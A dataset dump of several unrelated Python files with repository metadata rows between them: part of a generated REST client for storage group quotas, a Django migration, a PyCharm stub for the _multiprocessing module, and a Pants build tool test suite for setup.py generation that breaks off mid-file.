for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_group_quotas(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_group_quotas_with_http_info(**kwargs)
else:
(data) = self.list_group_quotas_with_http_info(**kwargs)
return data
def list_group_quotas_with_http_info(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'filter', 'limit', 'sort', 'start', 'token', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_group_quotas(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_group_quotas_with_http_info(**kwargs)
else:
(data) = self.update_group_quotas_with_http_info(**kwargs)
return data
def update_group_quotas_with_http_info(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| [
"[email protected]"
] | |
ba86f9ca658290dd2ff911890bc481e0c6568938 | 82e7b27cc4377def80c2b475645d502e40a0e498 | /newsletter/migrations/0009_auto_20160215_0258.py | d627d656950946d66269e848a6dd0b1a53943507 | [] | no_license | craYBoi/bryte | 850698e735a08ea10a08a78dc9e23b7e760c682f | d2b5a74d200ccb06cc3ef4e3180b83cbc338ce3e | refs/heads/master | 2022-12-12T08:54:56.863372 | 2017-06-28T05:03:32 | 2017-06-28T05:03:32 | 63,019,677 | 0 | 0 | null | 2022-11-22T01:00:25 | 2016-07-10T21:44:41 | CSS | UTF-8 | Python | false | false | 475 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-15 02:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0008_auto_20160215_0249'),
]
operations = [
migrations.AlterField(
model_name='price',
name='price',
field=models.PositiveSmallIntegerField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
bbd48bd8cb59d48d867df4dbad5af7cf9a4a87d6 | 085ce75a507df6e755cabb7a65c4a2a8c98762ba | /dockerfiles/root/.pycharm_helpers/python_stubs/-252567642/_multiprocessing.py | fee21a8eebfb053e451fc85ad0c04b02fa80eb4e | [] | no_license | Arhzi/habr-docker-article | d44302db1fe157d81fe0818e762e82218f50e31f | 6fb094860b612e307beadaeb22981aa0ee64e964 | refs/heads/master | 2021-01-23T20:41:47.398025 | 2015-12-10T08:56:33 | 2015-12-10T08:56:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,156 | py | # encoding: utf-8
# module _multiprocessing
# from /usr/local/lib/python2.7/lib-dynload/_multiprocessing.so
# by generator 1.137
# no doc
# no imports
# functions
def address_of_buffer(obj): # real signature unknown; restored from __doc__
"""
address_of_buffer(obj) -> int
Return address of obj assuming obj supports buffer inteface
"""
return 0
def recvfd(sockfd): # real signature unknown; restored from __doc__
"""
recvfd(sockfd) -> fd
Receive a file descriptor over a unix domain socket
whose file decriptor is sockfd
"""
pass
def sendfd(sockfd, fd): # real signature unknown; restored from __doc__
"""
sendfd(sockfd, fd) -> None
Send file descriptor given by fd over the unix domain socket
whose file decriptor is sockfd
"""
pass
# classes
class Connection(object):
"""
Connection type whose constructor signature is
Connection(handle, readable=True, writable=True).
The constructor does *not* duplicate the handle.
"""
def close(self, *args, **kwargs): # real signature unknown
""" close the connection """
pass
def fileno(self, *args, **kwargs): # real signature unknown
""" file descriptor or handle of the connection """
pass
def poll(self, *args, **kwargs): # real signature unknown
""" whether there is any input available to be read """
pass
def recv(self, *args, **kwargs): # real signature unknown
""" receive a (picklable) object """
pass
def recv_bytes(self, *args, **kwargs): # real signature unknown
""" receive byte data as a string """
pass
def recv_bytes_into(self, *args, **kwargs): # real signature unknown
"""
receive byte data into a writeable buffer-like object
returns the number of bytes read
"""
pass
def send(self, *args, **kwargs): # real signature unknown
""" send a (picklable) object """
pass
def send_bytes(self, *args, **kwargs): # real signature unknown
""" send the byte data from a readable buffer-like object """
pass
def __init__(self, handle, readable=True, writable=True): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is closed"""
readable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is readable"""
writable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is writable"""
class SemLock(object):
""" Semaphore/Mutex type """
def acquire(self, *args, **kwargs): # real signature unknown
""" acquire the semaphore/lock """
pass
def release(self, *args, **kwargs): # real signature unknown
""" release the semaphore/lock """
pass
def _after_fork(self, *args, **kwargs): # real signature unknown
""" rezero the net acquisition count after fork() """
pass
def _count(self, *args, **kwargs): # real signature unknown
""" num of `acquire()`s minus num of `release()`s for this process """
pass
def _get_value(self, *args, **kwargs): # real signature unknown
""" get the value of the semaphore """
pass
def _is_mine(self, *args, **kwargs): # real signature unknown
""" whether the lock is owned by this thread """
pass
def _is_zero(self, *args, **kwargs): # real signature unknown
""" returns whether semaphore has value zero """
pass
@classmethod
def _rebuild(cls, *args, **kwargs): # real signature unknown
""" """
pass
def __enter__(self, *args, **kwargs): # real signature unknown
""" enter the semaphore/lock """
pass
def __exit__(self, *args, **kwargs): # real signature unknown
""" exit the semaphore/lock """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
handle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
kind = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
maxvalue = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
SEM_VALUE_MAX = 2147483647L
# variables with complex values
flags = {
'HAVE_FD_TRANSFER': 1,
'HAVE_SEM_OPEN': 1,
'HAVE_SEM_TIMEDWAIT': 1,
}
| [
"[email protected]"
] | |
208a1844a81ead0571afc60c1414be53b9b0f78c | 05352c29e844705f02d65526343eea9b486f8bd7 | /src/python/pants/backend/python/rules/run_setup_py_test.py | 001faa56b7b0e7fd0e62305736c4abe5951844de | [
"Apache-2.0"
] | permissive | DoN-SultaN/pants | af2557de1178faaf73eed0a5a32e8f6fd34d2169 | 5cb5379003a0674c51f9a53f582cf690eddfaf45 | refs/heads/master | 2022-10-15T04:18:54.759839 | 2020-06-13T10:04:21 | 2020-06-13T10:04:21 | 272,089,524 | 1 | 0 | Apache-2.0 | 2020-06-13T21:36:50 | 2020-06-13T21:36:49 | null | UTF-8 | Python | false | false | 27,011 | py | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import textwrap
from typing import Iterable, Type
import pytest
from pants.backend.python.python_artifact import PythonArtifact
from pants.backend.python.rules.run_setup_py import (
AmbiguousOwnerError,
AncestorInitPyFiles,
DependencyOwner,
ExportedTarget,
ExportedTargetRequirements,
InvalidEntryPoint,
InvalidSetupPyArgs,
NoOwnerError,
OwnedDependencies,
OwnedDependency,
SetupPyChroot,
SetupPyChrootRequest,
SetupPySources,
SetupPySourcesRequest,
generate_chroot,
get_ancestor_init_py,
get_exporting_owner,
get_owned_dependencies,
get_requirements,
get_sources,
validate_args,
)
from pants.backend.python.target_types import PythonBinary, PythonLibrary, PythonRequirementLibrary
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.core.target_types import Resources
from pants.core.util_rules.determine_source_files import rules as determine_source_files_rules
from pants.core.util_rules.strip_source_roots import rules as strip_source_roots_rules
from pants.engine.addresses import Address
from pants.engine.fs import Snapshot
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.rules import RootRule
from pants.engine.selectors import Params
from pants.engine.target import Target, Targets, WrappedTarget
from pants.python.python_requirement import PythonRequirement
from pants.source.source_root import SourceRootConfig
from pants.testutil.option.util import create_options_bootstrapper
from pants.testutil.subsystem.util import init_subsystem
from pants.testutil.test_base import TestBase
_namespace_decl = "__import__('pkg_resources').declare_namespace(__name__)"
class TestSetupPyBase(TestBase):
@classmethod
def alias_groups(cls) -> BuildFileAliases:
return BuildFileAliases(
objects={"python_requirement": PythonRequirement, "setup_py": PythonArtifact}
)
@classmethod
def target_types(cls):
return [PythonBinary, PythonLibrary, PythonRequirementLibrary, Resources]
def tgt(self, addr: str) -> Target:
return self.request_single_product(WrappedTarget, Params(Address.parse(addr))).target
def init_source_root():
init_subsystem(SourceRootConfig, options={"source": {"root_patterns": ["src/python"]}})
class TestGenerateChroot(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
generate_chroot,
get_sources,
get_requirements,
get_ancestor_init_py,
get_owned_dependencies,
get_exporting_owner,
RootRule(SetupPyChrootRequest),
*determine_source_files_rules(),
*strip_source_roots_rules(),
]
def assert_chroot(self, expected_files, expected_setup_kwargs, addr):
chroot = self.request_single_product(
SetupPyChroot,
Params(
SetupPyChrootRequest(ExportedTarget(self.tgt(addr)), py2=False),
create_options_bootstrapper(args=["--source-root-patterns=src/python"]),
),
)
snapshot = self.request_single_product(Snapshot, Params(chroot.digest))
assert sorted(expected_files) == sorted(snapshot.files)
kwargs = json.loads(chroot.setup_keywords_json)
assert expected_setup_kwargs == kwargs
def assert_error(self, addr: str, exc_cls: Type[Exception]):
with pytest.raises(ExecutionError) as excinfo:
self.request_single_product(
SetupPyChroot,
Params(
SetupPyChrootRequest(ExportedTarget(self.tgt(addr)), py2=False),
create_options_bootstrapper(args=["--source-root-patterns=src/python"]),
),
)
ex = excinfo.value
assert len(ex.wrapped_exceptions) == 1
assert type(ex.wrapped_exceptions[0]) == exc_cls
def test_generate_chroot(self) -> None:
init_source_root()
self.create_file(
"src/python/foo/bar/baz/BUILD",
"python_library(provides=setup_py(name='baz', version='1.1.1'))",
)
self.create_file("src/python/foo/bar/baz/baz.py", "")
self.create_file(
"src/python/foo/qux/BUILD",
textwrap.dedent(
"""
python_library()
python_binary(name="bin", entry_point="foo.qux.bin")
"""
),
)
self.create_file("src/python/foo/qux/__init__.py", "")
self.create_file("src/python/foo/qux/qux.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["js/code.js"])')
self.create_file("src/python/foo/resources/js/code.js", "")
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
dependencies=[
'src/python/foo/bar/baz',
'src/python/foo/qux',
'src/python/foo/resources',
],
provides=setup_py(
name='foo', version='1.2.3'
).with_binaries(
foo_main='src/python/foo/qux:bin'
)
)
"""
),
)
self.create_file("src/python/foo/__init__.py", _namespace_decl)
self.create_file("src/python/foo/foo.py", "")
self.assert_chroot(
[
"src/foo/qux/__init__.py",
"src/foo/qux/qux.py",
"src/foo/resources/js/code.js",
"src/foo/__init__.py",
"src/foo/foo.py",
"setup.py",
"MANIFEST.in",
],
{
"name": "foo",
"version": "1.2.3",
"package_dir": {"": "src"},
"packages": ["foo", "foo.qux"],
"namespace_packages": ["foo"],
"package_data": {"foo": ["resources/js/code.js"]},
"install_requires": ["baz==1.1.1"],
"entry_points": {"console_scripts": ["foo_main=foo.qux.bin"]},
},
"src/python/foo",
)
def test_invalid_binary(self) -> None:
init_source_root()
self.create_file(
"src/python/invalid_binary/BUILD",
textwrap.dedent(
"""
python_library(name='not_a_binary', sources=[])
python_binary(name='no_entrypoint')
python_library(
name='invalid_bin1',
sources=[],
provides=setup_py(
name='invalid_bin1', version='1.1.1'
).with_binaries(foo=':not_a_binary')
)
python_library(
name='invalid_bin2',
sources=[],
provides=setup_py(
name='invalid_bin2', version='1.1.1'
).with_binaries(foo=':no_entrypoint')
)
"""
),
)
self.assert_error("src/python/invalid_binary:invalid_bin1", InvalidEntryPoint)
self.assert_error("src/python/invalid_binary:invalid_bin2", InvalidEntryPoint)
class TestGetSources(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_sources,
get_ancestor_init_py,
RootRule(SetupPySourcesRequest),
RootRule(SourceRootConfig),
*determine_source_files_rules(),
*strip_source_roots_rules(),
]
def assert_sources(
self,
expected_files,
expected_packages,
expected_namespace_packages,
expected_package_data,
addrs,
):
srcs = self.request_single_product(
SetupPySources,
Params(
SetupPySourcesRequest(Targets([self.tgt(addr) for addr in addrs]), py2=False),
SourceRootConfig.global_instance(),
),
)
chroot_snapshot = self.request_single_product(Snapshot, Params(srcs.digest))
assert sorted(expected_files) == sorted(chroot_snapshot.files)
assert sorted(expected_packages) == sorted(srcs.packages)
assert sorted(expected_namespace_packages) == sorted(srcs.namespace_packages)
assert expected_package_data == dict(srcs.package_data)
def test_get_sources(self) -> None:
init_source_root()
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=['baz1.py'])
python_library(name='baz2', sources=['baz2.py'])
"""
),
)
self.create_file("src/python/foo/bar/baz/baz1.py", "")
self.create_file("src/python/foo/bar/baz/baz2.py", "")
self.create_file("src/python/foo/bar/__init__.py", _namespace_decl)
self.create_file("src/python/foo/qux/BUILD", "python_library()")
self.create_file("src/python/foo/qux/__init__.py", "")
self.create_file("src/python/foo/qux/qux.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["js/code.js"])')
self.create_file("src/python/foo/resources/js/code.js", "")
self.create_file("src/python/foo/__init__.py", "")
self.assert_sources(
expected_files=["foo/bar/baz/baz1.py", "foo/bar/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.bar", "foo.bar.baz"],
expected_namespace_packages=["foo.bar"],
expected_package_data={},
addrs=["src/python/foo/bar/baz:baz1"],
)
self.assert_sources(
expected_files=["foo/bar/baz/baz2.py", "foo/bar/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.bar", "foo.bar.baz"],
expected_namespace_packages=["foo.bar"],
expected_package_data={},
addrs=["src/python/foo/bar/baz:baz2"],
)
self.assert_sources(
expected_files=["foo/qux/qux.py", "foo/qux/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.qux"],
expected_namespace_packages=[],
expected_package_data={},
addrs=["src/python/foo/qux"],
)
self.assert_sources(
expected_files=[
"foo/bar/baz/baz1.py",
"foo/bar/__init__.py",
"foo/qux/qux.py",
"foo/qux/__init__.py",
"foo/__init__.py",
"foo/resources/js/code.js",
],
expected_packages=["foo", "foo.bar", "foo.bar.baz", "foo.qux"],
expected_namespace_packages=["foo.bar"],
expected_package_data={"foo": ("resources/js/code.js",)},
addrs=["src/python/foo/bar/baz:baz1", "src/python/foo/qux", "src/python/foo/resources"],
)
self.assert_sources(
expected_files=[
"foo/bar/baz/baz1.py",
"foo/bar/baz/baz2.py",
"foo/bar/__init__.py",
"foo/qux/qux.py",
"foo/qux/__init__.py",
"foo/__init__.py",
"foo/resources/js/code.js",
],
expected_packages=["foo", "foo.bar", "foo.bar.baz", "foo.qux"],
expected_namespace_packages=["foo.bar"],
expected_package_data={"foo": ("resources/js/code.js",)},
addrs=[
"src/python/foo/bar/baz:baz1",
"src/python/foo/bar/baz:baz2",
"src/python/foo/qux",
"src/python/foo/resources",
],
)
class TestGetRequirements(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_requirements,
get_owned_dependencies,
get_exporting_owner,
RootRule(DependencyOwner),
]
def assert_requirements(self, expected_req_strs, addr):
reqs = self.request_single_product(
ExportedTargetRequirements,
Params(DependencyOwner(ExportedTarget(self.tgt(addr))), create_options_bootstrapper()),
)
assert sorted(expected_req_strs) == list(reqs)
def test_get_requirements(self) -> None:
self.create_file(
"3rdparty/BUILD",
textwrap.dedent(
"""
python_requirement_library(
name='ext1',
requirements=[python_requirement('ext1==1.22.333')],
)
python_requirement_library(
name='ext2',
requirements=[python_requirement('ext2==4.5.6')],
)
python_requirement_library(
name='ext3',
requirements=[python_requirement('ext3==0.0.1')],
)
"""
),
)
self.create_file(
"src/python/foo/bar/baz/BUILD",
"python_library(dependencies=['3rdparty:ext1'], sources=[])",
)
self.create_file(
"src/python/foo/bar/qux/BUILD",
"python_library(dependencies=['3rdparty:ext2', 'src/python/foo/bar/baz'], sources=[])",
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
sources=[],
dependencies=['src/python/foo/bar/baz', 'src/python/foo/bar/qux'],
provides=setup_py(name='bar', version='9.8.7'),
)
"""
),
)
self.create_file(
"src/python/foo/corge/BUILD",
textwrap.dedent(
"""
python_library(
sources=[],
dependencies=['3rdparty:ext3', 'src/python/foo/bar'],
provides=setup_py(name='corge', version='2.2.2'),
)
"""
),
)
self.assert_requirements(["ext1==1.22.333", "ext2==4.5.6"], "src/python/foo/bar")
self.assert_requirements(["ext3==0.0.1", "bar==9.8.7"], "src/python/foo/corge")
class TestGetAncestorInitPy(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_ancestor_init_py,
RootRule(Targets),
RootRule(SourceRootConfig),
*determine_source_files_rules(),
]
def assert_ancestor_init_py(
self, expected_init_pys: Iterable[str], addrs: Iterable[str]
) -> None:
ancestor_init_py_files = self.request_single_product(
AncestorInitPyFiles,
Params(
Targets([self.tgt(addr) for addr in addrs]), SourceRootConfig.global_instance(),
),
)
snapshots = [
self.request_single_product(Snapshot, Params(digest))
for digest in ancestor_init_py_files.digests
]
init_py_files_found = set([file for snapshot in snapshots for file in snapshot.files])
# NB: Doesn't include the root __init__.py or the missing src/python/foo/bar/__init__.py.
assert sorted(expected_init_pys) == sorted(init_py_files_found)
def test_get_ancestor_init_py(self) -> None:
init_source_root()
# NB: src/python/foo/bar/baz/qux/__init__.py is a target's source.
self.create_file("src/python/foo/bar/baz/qux/BUILD", "python_library()")
self.create_file("src/python/foo/bar/baz/qux/qux.py", "")
self.create_file("src/python/foo/bar/baz/qux/__init__.py", "")
self.create_file("src/python/foo/bar/baz/__init__.py", "")
# NB: No src/python/foo/bar/__init__.py.
# NB: src/python/foo/corge/__init__.py is not any target's source.
self.create_file("src/python/foo/corge/BUILD", 'python_library(sources=["corge.py"])')
self.create_file("src/python/foo/corge/corge.py", "")
self.create_file("src/python/foo/corge/__init__.py", "")
self.create_file("src/python/foo/__init__.py", "")
self.create_file("src/python/__init__.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["style.css"])')
self.create_file("src/python/foo/resources/style.css", "")
# NB: A stray __init__.py in a resources-only dir.
self.create_file("src/python/foo/resources/__init__.py", "")
# NB: None of these should include the root src/python/__init__.py, the missing
# src/python/foo/bar/__init__.py, or the stray src/python/foo/resources/__init__.py.
self.assert_ancestor_init_py(
["foo/bar/baz/qux/__init__.py", "foo/bar/baz/__init__.py", "foo/__init__.py"],
["src/python/foo/bar/baz/qux"],
)
self.assert_ancestor_init_py([], ["src/python/foo/resources"])
self.assert_ancestor_init_py(
["foo/corge/__init__.py", "foo/__init__.py"],
["src/python/foo/corge", "src/python/foo/resources"],
)
self.assert_ancestor_init_py(
[
"foo/bar/baz/qux/__init__.py",
"foo/bar/baz/__init__.py",
"foo/corge/__init__.py",
"foo/__init__.py",
],
["src/python/foo/bar/baz/qux", "src/python/foo/corge"],
)
class TestGetOwnedDependencies(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_owned_dependencies,
get_exporting_owner,
RootRule(DependencyOwner),
]
def assert_owned(self, owned: Iterable[str], exported: str):
assert sorted(owned) == sorted(
od.target.address.reference()
for od in self.request_single_product(
OwnedDependencies,
Params(
DependencyOwner(ExportedTarget(self.tgt(exported))),
create_options_bootstrapper(),
),
)
)
def test_owned_dependencies(self) -> None:
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=[])
python_library(name='baz2', sources=[])
"""
),
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
name='bar1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz1'],
provides=setup_py(name='bar1', version='1.1.1'),
)
python_library(
name='bar2',
sources=[],
dependencies=[':bar-resources', 'src/python/foo/bar/baz:baz2'],
)
resources(name='bar-resources', sources=[])
"""
),
)
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
name='foo',
sources=[],
dependencies=['src/python/foo/bar:bar1', 'src/python/foo/bar:bar2'],
provides=setup_py(name='foo', version='3.4.5'),
)
"""
),
)
self.assert_owned(
["src/python/foo/bar:bar1", "src/python/foo/bar/baz:baz1"], "src/python/foo/bar:bar1"
)
self.assert_owned(
[
"src/python/foo",
"src/python/foo/bar:bar2",
"src/python/foo/bar:bar-resources",
"src/python/foo/bar/baz:baz2",
],
"src/python/foo",
)
class TestGetExportingOwner(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_exporting_owner,
RootRule(OwnedDependency),
]
def assert_is_owner(self, owner: str, owned: str):
assert (
owner
== self.request_single_product(
ExportedTarget,
Params(OwnedDependency(self.tgt(owned)), create_options_bootstrapper()),
).target.address.reference()
)
def assert_error(self, owned: str, exc_cls: Type[Exception]):
with pytest.raises(ExecutionError) as excinfo:
self.request_single_product(
ExportedTarget,
Params(OwnedDependency(self.tgt(owned)), create_options_bootstrapper()),
)
ex = excinfo.value
assert len(ex.wrapped_exceptions) == 1
assert type(ex.wrapped_exceptions[0]) == exc_cls
def assert_no_owner(self, owned: str):
self.assert_error(owned, NoOwnerError)
def assert_ambiguous_owner(self, owned: str):
self.assert_error(owned, AmbiguousOwnerError)
def test_get_owner_simple(self) -> None:
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=[])
python_library(name='baz2', sources=[])
"""
),
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
name='bar1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz1'],
provides=setup_py(name='bar1', version='1.1.1'),
)
python_library(
name='bar2',
sources=[],
dependencies=[':bar-resources', 'src/python/foo/bar/baz:baz2'],
)
resources(name='bar-resources', sources=[])
"""
),
)
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
name='foo1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz2'],
provides=setup_py(name='foo1', version='0.1.2'),
)
python_library(name='foo2', sources=[])
python_library(
name='foo3',
sources=[],
